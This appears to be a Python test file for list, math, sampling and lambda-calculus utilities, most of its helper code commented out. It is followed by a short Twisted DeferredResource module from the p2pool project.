# elif isinstance(x, list): return tuple(x)
# else: return x
def test_unlist_singleton(self):
"""
Remove any sequences of nested lists with one element.
e.g. [[[1,3,4]]] -> [1,3,4]
"""
self.assertEqual(unlist_singleton(self.array), self.array)
self.assertEqual(unlist_singleton([[[1,3,4]]]), [1,3,4])
self.assertEqual(unlist_singleton([]), [])
def test_list2sexpstr(self):
"""
Prints a python list-of-lists as an s-expression
[['K', 'K'], [['S', 'K'], ['I', 'I']]] --> ((K K) ((S K) (I I)))
"""
self.assertEqual(list2sexpstr([['K', 'K'], [['S', 'K'], ['I', 'I']]]), '((K K) ((S K) (I I)))')
self.assertEqual(list2sexpstr([]), '()')
# s = re.sub(r'[\'\",]', r'', str(lst))
# s = re.sub(r'\[', '(', s) # changed r'(' to '('
# s = re.sub(r'\]', ')', s) # changed r')' to ')'
# return s
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Display functions
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def test_q(self):
"""
Quotes a string
"""
self.assertEqual(q("This is a string"), "'This is a string'")
self.assertEqual(q("This is a string", quote="\""), "\"This is a string\"")
self.assertEqual(q([]), "'[]'")
self.assertTrue(qq("This is a string") == q("This is a string", quote='"') == "\"This is a string\"")
# def test_qq(x): return q(x,quote="\"")
# def test_display(x): print x
# # for functional programming, print something and return it
# def test_printr(x):
# print x
# return x
# def test_r2(x): return round(x,2)
# def test_r3(x): return round(x,3)
# def test_r4(x): return round(x,4)
# def test_r5(x): return round(x,5)
# def test_tf201(x):
# if x: return 1
# else: return 0
# ## Functions for I/O
# def test_display_option_summary(obj):
# """
# Prints out a friendly format of all options -- for headers of output files
# This takes in an OptionParser object as an argument. As in, (options, args) = parser.parse_args()
# """
# from time import strftime, time, localtime
# import os
# print "####################################################################################################"
# try: print "# Username: ", os.getlogin()
# except OSError: pass
# try: print "# Date: ", strftime("%Y %b %d (%a) %H:%M:%S", localtime(time()) )
# except OSError: pass
# try: print "# Uname: ", os.uname()
# except OSError: pass
# try: print "# Pid: ", os.getpid()
# except OSError: pass
# for slot in dir(obj):
# attr = getattr(obj, slot)
# if not isinstance(attr, (types.BuiltinFunctionType, types.FunctionType, types.MethodType)) and (slot is not "__doc__") and (slot is not "__module__"):
# print "#", slot, "=", attr
# print "####################################################################################################"
# # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# # Genuine Miscellany
# # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# # a wrapper so we can call this in the below weirdo composition
# def test_raise_exception(e): raise e
# def test_ifelse(x,y,z):
# if x: return y
# else: return z
# def test_unique(gen):
# """
# Make a generator unique, returning each element only once
# """
# s = set()
# for gi in gen:
# if gi not in s:
# yield gi
# s.add(gi)
# def test_UniquifyFunction(gen):
# """
# A decorator to make a function only return unique values
# """
    # def f(*args, **kwargs):
# for x in unique(gen(*args, **kwargs)):
# yield x
# return f
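    # A runnable sketch of the unique-values decorator described above
    # (standalone illustration; the name _uniquify_sketch is hypothetical):
    #
    #   def _uniquify_sketch(gen_fn):
    #       def wrapped(*args, **kwargs):
    #           seen = set()
    #           for x in gen_fn(*args, **kwargs):
    #               if x not in seen:
    #                   seen.add(x)
    #                   yield x
    #       return wrapped
    #
    #   list(_uniquify_sketch(lambda: iter([1, 1, 2, 1, 3]))())  # -> [1, 2, 3]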
# def test_flatten(expr):
# """
# Flatten lists of lists, via stackoverflow
# """
    # def flatten_(expr):
# #print 'expr =', expr
# if expr is None or not isinstance(expr, collections.Iterable) or isinstance(expr, str):
# yield expr
# else:
# for node in expr:
# #print node, type(node)
# if (node is not None) and isinstance(node, collections.Iterable) and (not isinstance(node, str)):
# #print 'recursing on', node
# for sub_expr in flatten_(node):
# yield sub_expr
# else:
# #print 'yielding', node
# yield node
# return tuple([x for x in flatten_(expr)])
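    # A runnable sketch of the flatten_() recursion above: None, strings and
    # non-iterables are leaves, everything else recurses (standalone
    # illustration in this file's Python 2 style; _flatten_sketch is a
    # hypothetical name):
    #
    #   import collections
    #
    #   def _flatten_sketch(expr):
    #       if expr is None or isinstance(expr, str) or not isinstance(expr, collections.Iterable):
    #           yield expr
    #       else:
    #           for node in expr:
    #               for leaf in _flatten_sketch(node):
    #                   yield leaf
    #
    #   tuple(_flatten_sketch([1, [2, [3, 'ab']]]))  # -> (1, 2, 3, 'ab')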
# def test_flatten2str(expr, sep=' '):
# try:
# if expr is None: return ''
# else: return sep.join(flatten(expr))
# except TypeError:
# print "Error in flatter2str:", expr
# raise TypeError
# def test_weave(*iterables):
# """
# Intersperse several iterables, until all are exhausted.
    # This will nicely weave together multiple chains
# from: http://www.ibm.com/developerworks/linux/library/l-cpyiter/index.html
# """
# iterables = map(iter, iterables)
# while iterables:
# for i, it in enumerate(iterables):
# try: yield it.next()
# except StopIteration: del iterables[i]
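    # A runnable sketch of the same interleaving built on a deque, which
    # avoids deleting from the list while enumerate() is walking it
    # (standalone illustration; _weave_sketch is a hypothetical name):
    #
    #   from collections import deque
    #
    #   def _weave_sketch(*iterables):
    #       queue = deque(iter(it) for it in iterables)
    #       while queue:
    #           it = queue.popleft()
    #           try:
    #               yield it.next()  # next(it) on Python 3
    #           except StopIteration:
    #               continue
    #           queue.append(it)
    #
    #   list(_weave_sketch('ab', 'cde'))  # -> ['a', 'c', 'b', 'd', 'e']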
# # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# # Math functions
# # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    # # Special handling for numpypy, which doesn't provide gammaln; an assertion error is raised otherwise
# try:
# from scipy.special import gammaln
# except ImportError:
# # Die if we try to use this in numpypy
# def test_gammaln(*args, **kwargs): assert False
# ## This is just a wrapper to avoid logsumexp([-inf, -inf, -inf...]) warnings
# try:
# from scipy.misc import logsumexp as scipy_logsumexp
# except ImportError:
# try:
# from scipy.maxentropy import logsumexp as scipy_logsumexp
# except ImportError:
# # fine, our own version, no numpy
    # def scipy_logsumexp(v):
# m = max(v)
# return m+log(sum(map( lambda x: exp(x-m), v)))
# def test_logsumexp(v):
# """
# Logsumexp - our own version wraps the scipy to handle -infs
# """
# if max(v) > -Infinity: return scipy_logsumexp(v)
# else: return -Infinity
# def test_lognormalize(v):
# return v - logsumexp(v)
# def test_logplusexp(a, b):
# """
# Two argument version. No cast to numpy, so faster
# """
# m = max(a,b)
# return m+log(exp(a-m)+exp(b-m))
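    # A runnable sketch of the max trick used by logplusexp above: factoring
    # out the larger exponent keeps exp() from overflowing (standalone
    # illustration; _logplusexp_sketch is a hypothetical name):
    #
    #   from math import log, exp
    #
    #   def _logplusexp_sketch(a, b):
    #       m = max(a, b)
    #       if m == float('-inf'):  # log(0) + log(0)
    #           return float('-inf')
    #       return m + log(exp(a - m) + exp(b - m))
    #
    #   _logplusexp_sketch(log(0.25), log(0.25))  # ~= log(0.5)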
# def test_beta(a):
# """ Here a is a vector (of ints or floats) and this computes the Beta normalizing function,"""
# return np.sum(gammaln(np.array(a, dtype=float))) - gammaln(float(sum(a)))
# def test_normlogpdf(x, mu, sigma):
# """ The log pdf of a normal distribution """
# #print x, mu
    # return -math.log(math.sqrt(2. * pi) * sigma) - ((x - mu) * (x - mu)) / (2.0 * sigma * sigma)
# def test_norm_lpdf_multivariate(x, mu, sigma):
# # Via http://stackoverflow.com/questions/11615664/multivariate-normal-density-in-python
# size = len(x)
# # some checks:
# if size != len(mu) or (size, size) != sigma.shape: raise NameError("The dimensions of the input don't match")
# det = np.linalg.det(sigma)
# if det == 0: raise NameError("The covariance matrix can't be singular")
# norm_const = - size*log(2.0*pi)/2.0 - log(det)/2.0
# #norm_const = 1.0/ ( math.pow((2*pi),float(size)/2) * math.pow(det,1.0/2) )
# x_mu = np.matrix(x - mu)
# inv = np.linalg.inv(sigma)
# result = -0.5 * (x_mu * inv * x_mu.T)
# return norm_const + result
# def test_logrange(mn,mx,steps):
# """
    # Logarithmically-spaced values from mn to mx, with steps points in between
# mn - min value
# mx - max value
# steps - number of steps between. When 1, only mx is returned
# """
# mn = np.log(mn)
# mx = np.log(mx)
# r = np.arange(mn, mx, (mx-mn)/(steps-1))
# r = np.append(r, mx)
# return np.exp(r)
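    # For reference, logrange() above is essentially numpy's geomspace
    # (available in numpy >= 1.13):
    #
    #   np.geomspace(2.0, 32.0, 5)  # -> array([  2.,   4.,   8.,  16.,  32.])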
# def test_geometric_ldensity(n,p):
# """ Log density of a geomtric distribution """
# return (n-1)*log(1.0-p)+log(p)
# from math import expm1, log1p
# def test_log1mexp(a):
# """
# Computes log(1-exp(a)) according to Machler, "Accurately computing ..."
# Note: a should be a large negative value!
# """
# if a > 0: print >>sys.stderr, "# Warning, log1mexp with a=", a, " > 0"
# if a < -log(2.0): return log1p(-exp(a))
# else: return log(-expm1(a))
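    # A runnable sketch of the Machler log1mexp rule above: for a < -log(2)
    # use log1p(-exp(a)), otherwise log(-expm1(a)) (standalone illustration;
    # _log1mexp_sketch is a hypothetical name):
    #
    #   from math import log, log1p, exp, expm1
    #
    #   def _log1mexp_sketch(a):
    #       assert a < 0
    #       if a < -log(2.0):
    #           return log1p(-exp(a))
    #       return log(-expm1(a))
    #
    #   _log1mexp_sketch(log(0.25))  # ~= log(0.75)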
# # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# # Sampling functions
# # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# def test_sample1(*args): return sample_one(*args)
# def test_sample_one(*args):
# if len(args) == 1: return sample(args[0],1)[0] # use the list you were given
# else: return sample(args, 1)[0] # treat the arguments as a list
# def test_flip(p): return (random() < p)
# ## TODO: THIS FUNCTION SUCKS PLEASE FIX IT
# ## TODO: Change this so that if N is large enough, you sort
# # takes unnormalized probabilities and returns a list of the log probability and the object
# # returnlist makes the return always a list (even if N=1); otherwise it is a list for N>1 only
# # NOTE: This now can take probs as a function, which is then mapped!
# def test_weighted_sample(objs, N=1, probs=None, log=False, return_probability=False, returnlist=False, Z=None):
# """
# When we return_probability, it is *always* a log probability
# """
# # check how probabilities are specified
    # either as an argument, or as an attribute of objs (either .probability or .lp)
    # NOTE: This ALWAYS returns a log probability
# if len(objs) == 0: return None
# # convert to support indexing if we need it
# if isinstance(objs, set):
# objs = list(objs)
# myprobs = None
    # if probs is None: # by default, we use .lp
# myprobs = [1.0] * len(objs) # sample uniform
# elif isinstance(probs, types.FunctionType): # NOTE: this does not work for class instance methods
# myprobs = map(probs, objs)
# else:
# myprobs = map(float, probs)
# # Now normalize and run
# if Z is None:
# if log: Z = logsumexp(myprobs)
# else: Z = sum(myprobs)
# #print log, myprobs, Z
# out = []
# for n in range(N):
# r = random()
# for i in range(len(objs)):
# if log: r = r - exp(myprobs[i] - Z) # log domain
# else: r = r - (myprobs[i]/Z) # probability domain
# #print r, myprobs
# if r <= 0:
# if return_probability:
# lp = 0
# if log: lp = myprobs[i] - Z
# else: lp = math.log(myprobs[i]) - math.log(Z)
# out.append( [objs[i],lp] )
# break
# else:
# out.append( objs[i] )
# break
# if N == 1 and (not returnlist): return out[0] # don't give back a list if you just want one
# else: return out
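    # A runnable sketch of the sampling loop above, probability domain only:
    # normalize the weights, draw r ~ U(0,1), and walk the weights until r
    # is used up (standalone illustration; _weighted_sample_sketch is a
    # hypothetical name):
    #
    #   from random import random
    #
    #   def _weighted_sample_sketch(objs, weights):
    #       Z = float(sum(weights))
    #       r = random()
    #       for obj, w in zip(objs, weights):
    #           r -= w / Z
    #           if r <= 0:
    #               return obj
    #       return objs[-1]  # guard against floating-point round-off
    #
    #   _weighted_sample_sketch(['a', 'b'], [3, 1])  # 'a' about 75% of the time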
# # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# # Lambda calculus
# # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# # Some innate lambdas
# def test_lambdaZero(*x): return 0
# def test_lambdaOne(*x): return 1
# def test_lambdaNull(*x): return []
# def test_lambdaNone(*x): return None
# def test_lambdaTrue(*x): return True
    # def test_lambdaFalse(*x): return False
# def test_lambdaNAN(*x): return float("nan")
# def test_lambda_str(fn):
# """
# A nicer printer for pure lambda calculus
# """
# if fn is None: # just pass these through -- simplifies a lot
# return None
# elif fn.name == '':
# assert len(fn.args)==1
# return lambda_str(fn.args[0])
# elif fn.name == 'lambda':
# assert len(fn.args)==1
# #return u"\u03BB%s.%s" % (fn.bv_name, lambda_str(fn.args[0]))
# return "L%s.%s" % (fn.bv_name, lambda_str(fn.args[0]))
# elif fn.name == 'apply_':
# assert len(fn.args)==2
# if fn.args[0].name == 'lambda':
# return "((%s)(%s))" % tuple(map(lambda_str, fn.args))
# else:
# return "(%s(%s))" % tuple(map(lambda_str, fn.args))
# else:
# assert fn.args is None
# return str(fn.name)
# A Test Suite composed of all tests in this class
def suite():
return unittest.TestLoader().loadTestsFromTestCase(MiscellaneousTest)
# main code to run the test
if __name__ == '__main__':
unittest.main()
|
rickmei/p2pool | refs/heads/master | p2pool/util/deferred_resource.py | 283 | from __future__ import division
from twisted.internet import defer
from twisted.web import resource, server
from twisted.python import log
class DeferredResource(resource.Resource):
def render(self, request):
def finish(x):
if request.channel is None: # disconnected
return
if x is not None:
request.write(x)
request.finish()
def finish_error(fail):
if request.channel is None: # disconnected
return
request.setResponseCode(500) # won't do anything if already written to
request.write('---ERROR---')
request.finish()
log.err(fail, "Error in DeferredResource handler:")
defer.maybeDeferred(resource.Resource.render, self, request).addCallbacks(finish, finish_error)
return server.NOT_DONE_YET
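# Illustrative usage (a minimal sketch, not part of the original module;
# SlowHello is a hypothetical subclass): because render() wraps
# Resource.render in maybeDeferred, a subclass may return a Deferred from
# render_GET and the response body is written when the Deferred fires.
from twisted.internet import reactor, task

class SlowHello(DeferredResource):
    def render_GET(self, request):
        # deferLater stands in for any asynchronous work
        return task.deferLater(reactor, 1.0, lambda: 'hello, world')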
|